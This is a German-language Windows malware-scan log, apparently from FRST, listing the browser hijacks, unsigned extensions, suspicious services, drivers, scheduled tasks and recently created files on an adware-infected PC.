Handler-x32: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2015-12-02] (McAfee, Inc.)
Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files\mcafee\msc\McSnIePl64.dll [2012-05-14] (McAfee, Inc.)
Filter-x32: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files (x86)\McAfee\msc\McSnIePl.dll [2012-05-14] (McAfee, Inc.)
StartMenuInternet: IEXPLORE.EXE - iexplore.exe

FireFox:
========
FF ProfilePath: C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1
FF NewTab: chrome://quick_start/content/index.html
FF DefaultSearchEngine: yessearches
FF DefaultSearchEngine.US: data:text/plain,browser.search.defaultenginename.US=yessearches
FF SelectedSearchEngine: yoursearching
FF Homepage: search.mpc.am
FF Keyword.URL: hxxp://www.yessearches.com/chrome.php?uid=3D1DFE7FACF36BF04423BA9045228492&ptid=sqr1&ts=AHEpB38oBXYsBE..&v=20160121&mode=ffexttoolbar&q=
FF Plugin: @mcafee.com/MSC,version=10 -> c:\PROGRA~1\mcafee\msc\NPMCSN~1.DLL [2012-05-14] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2012-06-07] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2012-06-07] (Intel Corporation)
FF Plugin-x32: @mcafee.com/MSC,version=10 -> c:\progra~2\mcafee\msc\npmcsn~1.dll [2012-05-14] ()
FF user.js: detected! => C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\user.js [2016-02-06]
FF user.js: detected! => C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\user.js [2016-02-06]
FF SearchPlugin: C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\searchplugins\istartpageing.xml [2016-01-31]
FF SearchPlugin: C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\searchplugins\smod.xml [2016-01-31]
FF SearchPlugin: C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\searchplugins\yoursearching.xml [2016-01-31]
FF SearchPlugin: C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\searchplugins\DD1B66D4.xml [2016-01-31]
FF SearchPlugin: C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\searchplugins\istartpageing.xml [2016-01-31]
FF SearchPlugin: C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\searchplugins\yoursearching.xml [2016-01-31]
FF Extension: FirefixTab - C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\Extensions\deskCutv2@gmail.com [2016-01-31] [ist nicht signiert]
FF Extension: YahooToolsProtected  - C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\Extensions\yahooprotected@gmail.com [2016-01-31] [ist nicht signiert]
FF Extension: FirefixTab - C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\Extensions\deskCutv2@gmail.com [2016-01-31] [ist nicht signiert]
FF Extension: YahooToolsProtected  - C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\Extensions\yahooprotected@gmail.com [2016-01-31] [ist nicht signiert]
FF HKLM\...\Firefox\Extensions: [{F64D5F15-81C2-4573-814A-31A0BF41A433}] - C:\Program Files\shopperz010220161759\Firefox\{F64D5F15-81C2-4573-814A-31A0BF41A433}.xpi => nicht gefunden
FF HKLM\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi
FF Extension: McAfee WebAdvisor - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi [2015-11-23]
FF HKLM-x32\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi
FF HKLM-x32\...\Firefox\Extensions: [deskCutv2@gmail.com] - C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\extensions\deskCutv2@gmail.com
FF HKLM-x32\...\Firefox\Extensions: [yahooprotected@gmail.com] - C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\extensions\yahooprotected@gmail.com
FF HKLM-x32\...\Firefox\Extensions: [{63D7461E-C5DF-4012-87F0-A52D95FE9EC3}] - C:\WINDOWS\Installer\{40E468DE-4F96-445E-98FD-B843B650E95B}\{63D7461E-C5DF-4012-87F0-A52D95FE9EC3}.xpi
FF Extension: Download Protect - C:\WINDOWS\Installer\{40E468DE-4F96-445E-98FD-B843B650E95B}\{63D7461E-C5DF-4012-87F0-A52D95FE9EC3}.xpi [2016-01-31]
FF HKLM-x32\...\Firefox\Extensions: [{F64D5F15-81C2-4573-814A-31A0BF41A433}] - C:\Program Files\shopperz010220161759\Firefox\{F64D5F15-81C2-4573-814A-31A0BF41A433}.xpi => nicht gefunden
FF HKLM-x32\...\Firefox\Extensions: [{68168E9E-D81A-4095-8CAB-A6196896B695}] - C:\WINDOWS\Installer\{46242452-A8DC-46C4-94FC-6839E9398290}\{68168E9E-D81A-4095-8CAB-A6196896B695}.xpi
FF Extension: Download Protect - C:\WINDOWS\Installer\{46242452-A8DC-46C4-94FC-6839E9398290}\{68168E9E-D81A-4095-8CAB-A6196896B695}.xpi [2016-02-06]
FF HKLM-x32\...\Thunderbird\Extensions: [msktbird@mcafee.com] - C:\Program Files\McAfee\MSK
FF Extension: McAfee Anti-Spam Thunderbird Extension - C:\Program Files\McAfee\MSK [2016-01-31] [ist nicht signiert]
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\defaults\pref\!FCD01E059CED5F6D5A56ED297FC9FBBCFCD0.js [2016-01-31] <==== ACHTUNG
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\FCD01E059CED5F6D5A56ED297FC9FBBCFCD0 [2016-01-31] <==== ACHTUNG

Chrome: 
=======
CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2016-02-06]
CHR HKU\S-1-5-21-2229505580-413648313-3343944023-1002\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [jlcgehabolcakkjhgmgpkagpolbjlhfa] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2016-02-06]

==================== Dienste (Nicht auf der Ausnahmeliste) ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

S3 343FB16B-F8B8-4C5B-b5AE-FC1452693CBD; C:\Program Files\shopperz010220161759\Irytutia.exe [291160 2016-02-01] ()
R2 AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [207488 2012-07-31] (Qualcomm Atheros Commnucations) [Datei ist nicht signiert]
S3 brsrv; C:\Users\Manz\AppData\Local\BrowserAir\47.0.0.4\brsrv.exe [104448 2016-01-31] () [Datei ist nicht signiert]
R2 CCDMonitorService; C:\Program Files (x86)\Acer\Acer Cloud\CCDMonitorService.exe [2435728 2012-08-23] (Acer Incorporated)
R2 ClaraUpdater; C:\Program Files (x86)\Common Files\ClaraUpdater\ClaraUpdater.exe [777944 2016-02-01] (ClaraLabs)
R2 CltMngSvc; C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe [3246864 2016-01-14] (Client Connect LTD)
S3 csrcc; C:\Program Files\shopperz010220161759\csrcc.exe [1497432 2016-02-01] ()
S3 DeviceFastLaneService; C:\Program Files\Acer\Acer Device Fast-lane\DeviceFastLaneSvc.exe [468624 2012-08-22] (Acer Incorporated)
R2 DnsBlockUpdateSvc; C:\WINDOWS\system32\DnsBlockUpdateSvc.exe [151072 2016-01-31] ()
S3 ePowerSvc; C:\Program Files\Acer\Acer Power Management\ePowerSvc.exe [658576 2012-08-22] (Acer Incorporated)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [165760 2012-07-18] (Intel Corporation)
R2 LavasoftTcpService; C:\Program Files (x86)\Lavasoft\Web Companion\TcpService\2.3.4.7\LavasoftTcpService.exe [2751760 2016-01-31] (Lavasoft Limited)
R2 McAfee SiteAdvisor Service; C:\Program Files (x86)\McAfee\SiteAdvisor\McSACore.exe [157928 2015-12-02] (McAfee, Inc.)
S3 McAWFwk; c:\Program Files\mcafee\msc\McAWFwk.exe [332080 2012-01-26] (McAfee, Inc.)
R2 McMPFSvc; C:\Program Files\Common Files\McAfee\McSvcHost\McSvHost.exe [200728 2012-05-11] (McAfee, Inc.)
R2 mcmscsvc; C:\Program Files\Common Files\mcafee\McSvcHost\McSvHost.exe [200728 2012-05-11] (McAfee, Inc.)
R2 McNaiAnn; C:\Program Files\Common Files\mcafee\McSvcHost\McSvHost.exe [200728 2012-05-11] (McAfee, Inc.)
U2 McNASvc; C:\Program Files\Common Files\mcafee\McSvcHost\McSvHost.exe [200728 2012-05-11] (McAfee, Inc.)
S3 McODS; C:\Program Files\mcafee\VirusScan\mcods.exe [383608 2012-05-22] (McAfee, Inc.)
R2 McOobeSv; C:\Program Files\Common Files\mcafee\McSvcHost\McSvHost.exe [200728 2012-05-11] (McAfee, Inc.)
R2 McProxy; C:\Program Files\Common Files\mcafee\McSvcHost\McSvHost.exe [200728 2012-05-11] (McAfee, Inc.)
S2 McShield; C:\Program Files\Common Files\McAfee\SystemCore\\mcshield.exe [237920 2012-06-22] (McAfee, Inc.)
R2 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe [218320 2012-06-22] (McAfee, Inc.)
R2 mfevtp; C:\windows\system32\mfevtps.exe [177144 2012-06-22] (McAfee, Inc.)
R2 MPCProtectService; C:\Program Files (x86)\MPC Cleaner\MPCProtectService.exe [349152 2016-02-06] (DotC United Inc)
R2 MSK80Service; C:\Program Files\Common Files\McAfee\McSvcHost\McSvHost.exe [200728 2012-05-11] (McAfee, Inc.)
R2 NTI IScheduleSvc; C:\Program Files (x86)\NTI\Acer Backup Manager\IScheduleSvc.exe [259136 2012-08-22] (NTI Corporation)
R2 Orbiter; C:\Program Files (x86)\ORBTR\orbiter.dll [558544 2016-02-06] (Client Connect LTD)
R2 RfButtonDriverService; C:\Windows\RfBtnSvc64.exe [93296 2012-09-11] (Dritek System INC.)
R2 rowugoqo; C:\Users\Manz\AppData\Local\B5B53C54-1454249191-E111-8F5D-B888E3A0B275\snscEFCA.tmp [225792 2016-01-31] () [Datei ist nicht signiert]
R2 shopperz010220161759 Updater; C:\Program Files\shopperz010220161759\Lugke.exe [158552 2016-02-01] ()
S4 SSFK; C:\Program Files (x86)\SFK\SSFK.exe [182976 2016-01-31] () [Datei ist nicht signiert]
R2 WdMan; C:\ProgramData\2WdM2\WdMan.exe [794376 2016-01-31] (TU-Funs LIMITED)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [15440 2012-07-26] (Microsoft Corporation)
R2 wucotusy; C:\Program Files (x86)\B5B53C54-1454245483-E111-8F5D-B888E3A0B275\hnsv4533.tmp [416256 2016-01-31] () [Datei ist nicht signiert]
R2 ZAtheros Wlan Agent; C:\Program Files (x86)\Qualcomm Atheros\Ath_WlanAgent.exe [81536 2012-08-01] (Atheros) [Datei ist nicht signiert]
S2 zigipyro; C:\Users\Manz\AppData\Local\B5B53C54-1454354074-E111-8F5D-B888E3A0B275\qnse4D3A.tmp [158720 2015-12-26] () [Datei ist nicht signiert]
R2 zutuzuni; C:\Program Files (x86)\B5B53C54-1454245483-E111-8F5D-B888E3A0B275\jnsl20B1.tmp [307712 2016-01-31] () [Datei ist nicht signiert]
R2 nekydufizbt; C:\Program Files (x86)\B5B53C54-1454245483-E111-8F5D-B888E3A0B275\knsbFC2B.tmpfs [X]
S2 Ofelje; "C:\Users\Manz\AppData\Roaming\IodelBefqo\Uithzaa.exe" -cms [X]

===================== Treiber (Nicht auf der Ausnahmeliste) ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

S3 BCM43XX; C:\Windows\system32\DRIVERS\bcmwl63a.sys [5139968 2012-06-02] (Broadcom Corporation)
R1 bsdriver; C:\WINDOWS\system32\drivers\bsdriver.sys [34712 2016-02-01] ()
S3 BTATH_LWFLT; C:\Windows\system32\DRIVERS\btath_lwflt.sys [76952 2012-07-31] (Qualcomm Atheros)
R3 cfwids; C:\Windows\System32\drivers\cfwids.sys [69672 2012-06-22] (McAfee, Inc.)
R1 cherimoya; C:\Windows\System32\drivers\cherimoya.sys [56728 2016-02-01] (Windows (R) Win 7 DDK provider)
S0 ebdrv; C:\Windows\System32\drivers\evbda.sys [3295984 2012-07-26] (Broadcom Corporation)
S3 HipShieldK; C:\Windows\System32\drivers\HipShieldK.sys [196440 2012-04-21] (McAfee, Inc.)
S3 mfeapfk; C:\Windows\System32\drivers\mfeapfk.sys [169320 2012-06-22] (McAfee, Inc.)
R3 mfeavfk; C:\Windows\System32\drivers\mfeavfk.sys [300392 2012-06-22] (McAfee, Inc.)
S0 mfeelamk; C:\Windows\System32\drivers\mfeelamk.sys [66712 2012-06-18] (McAfee, Inc.)
R3 mfefirek; C:\Windows\System32\drivers\mfefirek.sys [513456 2012-06-22] (McAfee, Inc.)
R0 mfehidk; C:\Windows\System32\drivers\mfehidk.sys [752672 2012-06-22] (McAfee, Inc.)
S3 mferkdet; C:\Windows\System32\drivers\mferkdet.sys [106112 2012-06-22] (McAfee, Inc.)
S3 mfesapsn; C:\Program Files (x86)\McAfee\SiteAdvisor\x64\mfesapsn.sys [37960 2015-12-02] (McAfee, Inc.)
R0 mfewfpk; C:\Windows\System32\drivers\mfewfpk.sys [335784 2012-06-22] (McAfee, Inc.)
R1 MPCKpt; C:\Windows\System32\DRIVERS\MPCKpt.sys [60136 2016-02-06] (DotC United Inc)
R3 Ps2Kb2Hid; C:\Windows\System32\drivers\aPs2Kb2Hid.sys [26736 2012-09-11] (Dritek System Inc.)
R3 sdfhgdf; C:\Windows\System32\DRIVERS\sdfhgdf.sys [23208 2016-02-06] (Corporation) [Datei ist nicht signiert]
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [34216 2012-07-26] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [258288 2012-07-26] (Microsoft Corporation)
S3 IntcAzAudAddService; \SystemRoot\system32\drivers\RTKVHD64.sys [X]
S4 nvlddmkm; \SystemRoot\system32\DRIVERS\nvlddmkm.sys [X]
S4 nvpciflt; \SystemRoot\system32\DRIVERS\nvpciflt.sys [X]
R3 SPPD; \??\C:\WINDOWS\system32\drivers\SPPD.sys [X]

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2016-02-06 19:06 - 2016-02-06 19:06 - 00000000 ____D C:\Users\Manz\AppData\Roaming\GeniusCache
2016-02-06 18:51 - 2016-02-06 18:51 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee
2016-02-06 18:47 - 2016-02-06 18:48 - 00000000 ____D C:\FRST
2016-02-06 18:45 - 2016-02-06 18:45 - 00000000 ____D C:\Program Files\{BC760D76-4920-48C3-A3DD-6689681D1D92}
2016-02-06 18:45 - 2016-02-06 18:45 - 00000000 ____D C:\Program Files (x86)\{6E5909E8-3B98-4878-BF84-218A47B5BDBE}
2016-02-06 18:44 - 2016-02-06 18:44 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MPC
2016-02-06 16:41 - 2016-02-06 18:44 - 00001693 _____ C:\Users\Public\Desktop\MPC Cleaner.lnk
2016-02-06 16:38 - 2016-02-06 16:38 - 00001022 _____ C:\Users\Public\Desktop\Max Driver Updater.lnk
2016-02-06 16:38 - 2016-02-06 16:38 - 00000000 ____D C:\Users\Manz\AppData\Roaming\csdimedia
2016-02-06 16:38 - 2016-02-06 16:38 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Max Driver Updater
2016-02-06 16:37 - 2016-02-06 16:38 - 00000000 ____D C:\Program Files (x86)\Max Driver Updater
2016-02-06 16:37 - 2016-02-06 16:38 - 00000000 ____D C:\Program Files (x86)\DNS Unlocker
2016-02-06 16:37 - 2016-02-06 16:37 - 00003492 _____ C:\WINDOWS\System32\Tasks\IBUpd
2016-02-06 16:37 - 2016-02-06 16:37 - 00003444 _____ C:\WINDOWS\System32\Tasks\bvxvbxxvaa
2016-02-06 16:37 - 2016-02-06 16:37 - 00002262 _____ C:\Users\Manz\Desktop\BrowserAir.lnk
2016-02-06 16:37 - 2016-02-06 16:37 - 00000000 ____D C:\Users\Manz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\BrowserAir
2016-02-06 16:36 - 2016-02-06 18:47 - 00000000 ____D C:\Users\Manz\AppData\Local\gmsd_de_005010228
2016-02-06 16:36 - 2016-02-06 16:36 - 00000000 ____D C:\Users\Manz\AppData\Local\bvxvbxxvaa
2016-02-06 16:36 - 2016-02-06 16:36 - 00000000 ____D C:\Program Files (x86)\gmsd_de_005010228
2016-02-06 16:35 - 2016-02-06 16:37 - 00000000 ____D C:\Users\Manz\AppData\Local\SearchProtect
2016-02-06 16:35 - 2016-02-06 16:36 - 00000000 ____D C:\Program Files (x86)\SearchProtect
2016-02-06 16:35 - 2016-02-06 16:35 - 00000000 ____D C:\Program Files (x86)\ORBTR
2016-02-06 16:33 - 2016-02-06 16:33 - 00060136 _____ (DotC United Inc) C:\WINDOWS\system32\Drivers\MPCKpt.sys
2016-02-06 16:33 - 2016-02-06 16:33 - 00003228 _____ C:\WINDOWS\System32\Tasks\runTask
2016-02-06 16:33 - 2016-02-06 16:33 - 00003132 _____ C:\WINDOWS\System32\Tasks\updateTask
2016-02-06 16:32 - 2016-02-06 16:35 - 00000000 ____D C:\Program Files (x86)\SpaceSondPro_v53.12776
2016-02-06 16:32 - 2016-02-06 16:32 - 00000836 _____ C:\Users\Manz\Desktop\SpaceSoundPro.lnk
2016-02-06 16:32 - 2016-02-06 16:32 - 00000752 _____ C:\Users\Manz\Desktop\Sound+.lnk
2016-02-06 16:32 - 2016-02-06 16:32 - 00000000 ____D C:\Users\Manz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SpaceSoundPro 1.0
2016-02-06 16:32 - 2016-02-06 16:32 - 00000000 ____D C:\Users\Manz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Sound+ 1.0
2016-02-06 16:31 - 2016-02-06 16:38 - 00000000 ____D C:\Program Files\Sound+
2016-02-06 16:20 - 2016-02-06 16:20 - 00000000 ____D C:\Users\Manz\AppData\Local\rec_de_184
2016-02-06 16:20 - 2016-02-06 16:20 - 00000000 ____D C:\Program Files (x86)\rec_de_184
2016-02-06 16:20 - 2016-02-06 16:20 - 00000000 ____D C:\Program Files (x86)\Games-desktop
2016-02-01 19:50 - 2016-02-06 18:46 - 00002316 _____ C:\Users\Manz\Desktop\Facebook.lnk
2016-02-01 19:50 - 2016-02-06 18:46 - 00002314 _____ C:\Users\Manz\Desktop\Wikipedia.lnk
2016-02-01 19:50 - 2016-02-06 18:46 - 00002310 _____ C:\Users\Manz\Desktop\Youtube.lnk
2016-02-01 19:50 - 2016-02-06 18:46 - 00002310 _____ C:\Users\Manz\Desktop\Hotmail.lnk
2016-02-01 19:50 - 2016-02-06 18:46 - 00002302 _____ C:\Users\Manz\Desktop\Amazon.lnk
2016-02-01 19:43 - 2016-02-01 19:43 - 00000117 _____ C:\WINDOWS\system32\netcfg-50609.txt
2016-02-01 19:43 - 2016-02-01 19:43 - 00000117 _____ C:\WINDOWS\system32\netcfg-50562.txt
2016-02-01 19:43 - 2016-02-01 19:43 - 00000117 _____ C:\WINDOWS\system32\netcfg-49546.txt
2016-02-01 19:42 - 2016-02-01 19:42 - 00000000 ____D C:\WINDOWS\system32\ege
2016-02-01 19:37 - 2016-02-06 16:37 - 00000099 _____ C:\Users\Manz\AppData\Roaming\WB.CFG
2016-02-01 19:33 - 2016-02-01 19:33 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GMX MailCheck
2016-02-01 19:33 - 2016-02-01 19:33 - 00000000 ____D C:\Program Files\GMX MailCheck
2016-02-01 19:33 - 2016-02-01 19:33 - 00000000 ____D C:\Program Files (x86)\GMX MailCheck
2016-02-01 19:23 - 2016-02-01 19:23 - 00001143 _____ C:\Users\Manz\Desktop\Continue Last version Installation.lnk
2016-02-01 19:14 - 2016-02-01 19:14 - 00000000 ____D C:\Users\Manz\AppData\Local\B5B53C54-1454354074-E111-8F5D-B888E3A0B275
2016-02-01 18:58 - 2016-02-01 18:58 - 00003172 _____ C:\WINDOWS\System32\Tasks\crash_service
2016-02-01 18:58 - 2016-02-01 18:58 - 00003140 _____ C:\WINDOWS\System32\Tasks\Run_Bobby_Browser
2016-02-01 18:58 - 2016-02-01 18:58 - 00002272 _____ C:\Users\Manz\Desktop\BoBrowser.lnk
2016-02-01 18:58 - 2016-02-01 18:58 - 00000000 ____D C:\Users\Manz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\BoBrowser
2016-02-01 18:58 - 2016-02-01 18:58 - 00000000 ____D C:\Users\Manz\AppData\Local\Tempfolder
2016-02-01 18:57 - 2016-02-01 18:58 - 00000000 ____D C:\Users\Manz\AppData\Local\BoBrowser
2016-02-01 18:57 - 2016-02-01 18:57 - 00034712 _____ () C:\WINDOWS\system32\Drivers\bsdriver.sys
2016-02-01 18:57 - 2016-02-01 18:57 - 00003334 _____ C:\WINDOWS\System32\Tasks\Awiikjuw
2016-02-01 18:57 - 2016-02-01 18:57 - 00000000 ____D C:\Users\Manz\AppData\LocalLow\Company
2016-02-01 18:57 - 2016-02-01 18:57 - 00000000 ____D C:\Users\Manz\AppData\LocalLow\{D2020D47-707D-4E26-B4D9-739C4F4C2E9A}
2016-02-01 18:57 - 2016-02-01 18:57 - 00000000 ____D C:\uninst
2016-02-01 18:57 - 2016-02-01 18:57 - 00000000 ____D C:\Program Files\shopperz010220161759
2016-02-01 18:52 - 2016-02-01 18:52 - 00000827 _____ C:\Users\Manz\Desktop\3D BubbleSound.lnk
2016-02-01 18:52 - 2016-02-01 18:52 - 00000000 ____D C:\Users\Manz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\BubbleSound 1.0
2016-02-01 18:52 - 2016-02-01 18:52 - 00000000 ____D C:\Program Files\BubbleSound
2016-02-01 18:43 - 2016-02-01 18:43 - 00000117 _____ C:\WINDOWS\system32\netcfg-50265.txt
2016-02-01 17:02 - 2016-02-01 18:57 - 00056728 _____ (Windows (R) Win 7 DDK provider) C:\WINDOWS\system32\Drivers\cherimoya.sys
2016-01-31 21:46 - 2016-01-31 21:46 - 00000117 _____ C:\WINDOWS\system32\netcfg-3146031.txt
2016-01-31 21:42 - 2016-01-31 21:42 - 00000000 ____D C:\Users\Manz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chromium
2016-01-31 21:42 - 2016-01-31 21:42 - 00000000 ____D C:\Users\Manz\AppData\Local\Chromium
2016-01-31 21:39 - 2016-01-31 21:39 - 00003514 _____ C:\WINDOWS\System32\Tasks\ProfessionalCleaningSoftware_Popup
2016-01-31 21:39 - 2016-01-31 21:39 - 00003250 _____ C:\WINDOWS\System32\Tasks\ProfessionalCleaningSoftware_Start
2016-01-31 21:39 - 2016-01-31 21:39 - 00000000 ____D C:\Users\Manz\AppData\Roaming\updates
2016-01-31 21:39 - 2016-01-31 21:39 - 00000000 ____D C:\Users\Manz\AppData\Roaming\AVG
2016-01-31 21:38 - 2016-01-31 21:38 - 00000000 ____D C:\Users\Manz\AppData\Local\Professional_Cleaning_Sof
2016-01-31 21:37 - 2016-02-06 16:38 - 00000298 _____ C:\WINDOWS\Tasks\Price Fountain.job
2016-01-31 21:37 - 2016-02-06 16:37 - 00000276 _____ C:\WINDOWS\Tasks\Go_Palikan.job
2016-01-31 21:37 - 2016-02-01 19:49 - 00000000 ____D C:\Users\Manz\AppData\Local\ObscenelyAd
2016-01-31 21:37 - 2016-01-31 21:39 - 00000000 ____D C:\Users\Manz\Documents\ProfessionalCleaningSoftware
2016-01-31 21:37 - 2016-01-31 21:37 - 00003428 _____ C:\WINDOWS\System32\Tasks\ManzObscenelyAdV2
2016-01-31 21:37 - 2016-01-31 21:37 - 00002636 _____ C:\WINDOWS\System32\Tasks\Price Fountain
2016-01-31 21:37 - 2016-01-31 21:37 - 00002614 _____ C:\WINDOWS\System32\Tasks\Go_Palikan
2016-01-31 21:37 - 2016-01-31 21:37 - 00000000 ____D C:\Users\Manz\AppData\Roaming\PriceFountain
2016-01-31 21:37 - 2016-01-31 21:37 - 00000000 ____D C:\Users\Manz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Professional Cleaning Software
2016-01-31 21:37 - 2016-01-31 21:37 - 00000000 ____D C:\Users\Manz\AppData\Local\{8396B5CA-A73E-D972-CAA6-FC9AEECE0002}
2016-01-31 21:37 - 2016-01-31 21:37 - 00000000 ____D C:\Program Files (x86)\Professional Cleaning Software
2016-01-31 21:37 - 2016-01-31 21:37 - 00000000 ____D C:\Program Files (x86)\Pro PC Cleaner
2016-01-31 21:29 - 2016-02-01 19:17 - 00000000 ____D C:\Program Files (x86)\AVG
2016-01-31 21:27 - 2016-01-31 21:27 - 00000000 ____D C:\Users\Manz\AppData\Roaming\Opera Software
2016-01-31 21:27 - 2016-01-31 21:27 - 00000000 ____D C:\Users\Manz\AppData\Local\Opera Software
2016-01-31 21:23 - 2016-02-01 19:19 - 00000000 ____D C:\Program Files (x86)\Opera
2016-01-31 21:22 - 2016-01-31 21:23 - 00000000 ____D C:\Program Files (x86)\1und1Softwareaktualisierung
2016-01-31 21:22 - 2016-01-31 21:22 - 00003862 _____ C:\WINDOWS\System32\Tasks\Registration 1und1 Task
2016-01-31 21:22 - 2016-01-31 21:22 - 00003586 _____ C:\WINDOWS\System32\Tasks\Security Utility Updater
2016-01-31 21:22 - 2016-01-31 21:22 - 00000000 ____D C:\Users\Manz\AppData\LocalLow\1&1 Mail & Media GmbH
2016-01-31 21:22 - 2016-01-31 21:22 - 00000000 ____D C:\ProgramData\UUdb
2016-01-31 21:22 - 2016-01-31 21:22 - 00000000 ____D C:\ProgramData\1&1 Mail & Media GmbH
2016-01-31 21:22 - 2016-01-31 21:22 - 00000000 ____D C:\Program Files (x86)\securityutility
2016-01-31 21:20 - 2016-01-31 21:20 - 00550896 _____ C:\Users\Manz\Downloads\adobe-digital-editions-4.0-setup.exe
2016-01-31 21:12 - 2016-01-31 21:12 - 00001173 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Thunderbird.lnk
2016-01-31 21:12 - 2016-01-31 21:12 - 00001161 _____ C:\Users\Public\Desktop\Mozilla Thunderbird.lnk
2016-01-31 21:12 - 2016-01-31 21:12 - 00000000 ____D C:\Users\Manz\AppData\Roaming\Thunderbird
2016-01-31 21:12 - 2016-01-31 21:12 - 00000000 ____D C:\Users\Manz\AppData\Local\Thunderbird
2016-01-31 21:12 - 2016-01-31 21:12 - 00000000 ____D C:\Program Files (x86)\Mozilla Thunderbird
2016-01-31 21:12 - 2016-01-31 21:12 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-01-31 21:00 - 2016-01-31 21:00 - 00000117 _____ C:\WINDOWS\system32\netcfg-361281.txt
2016-01-31 20:59 - 2016-01-31 20:59 - 00000323 _____ C:\WINDOWS\system32\netcfg-349968.txt
2016-01-31 20:59 - 2016-01-31 20:59 - 00000117 _____ C:\WINDOWS\system32\netcfg-347609.txt
2016-01-31 20:59 - 2016-01-31 20:59 - 00000117 _____ C:\WINDOWS\system32\netcfg-344468.txt
2016-01-31 20:59 - 2016-01-31 20:59 - 00000117 _____ C:\WINDOWS\system32\netcfg-334234.txt
2016-01-31 20:57 - 2016-02-06 16:45 - 00000000 ____D C:\Users\Manz\AppData\Local\CrashDumps
2016-01-31 20:54 - 2016-01-31 20:54 - 00000117 _____ C:\WINDOWS\system32\netcfg-41625.txt
2016-01-31 20:53 - 2016-01-31 20:53 - 00000117 _____ C:\WINDOWS\system32\netcfg-1946671.txt
2016-01-31 20:53 - 2016-01-31 20:53 - 00000000 ____D C:\Users\Manz\AppData\Local\B5B53C54-1454273619-E111-8F5D-B888E3A0B275
2016-01-31 20:22 - 2016-01-31 20:22 - 00000117 _____ C:\WINDOWS\system32\netcfg-41890.txt
2016-01-31 20:20 - 2016-01-31 20:20 - 00000117 _____ C:\WINDOWS\system32\netcfg-809703.txt
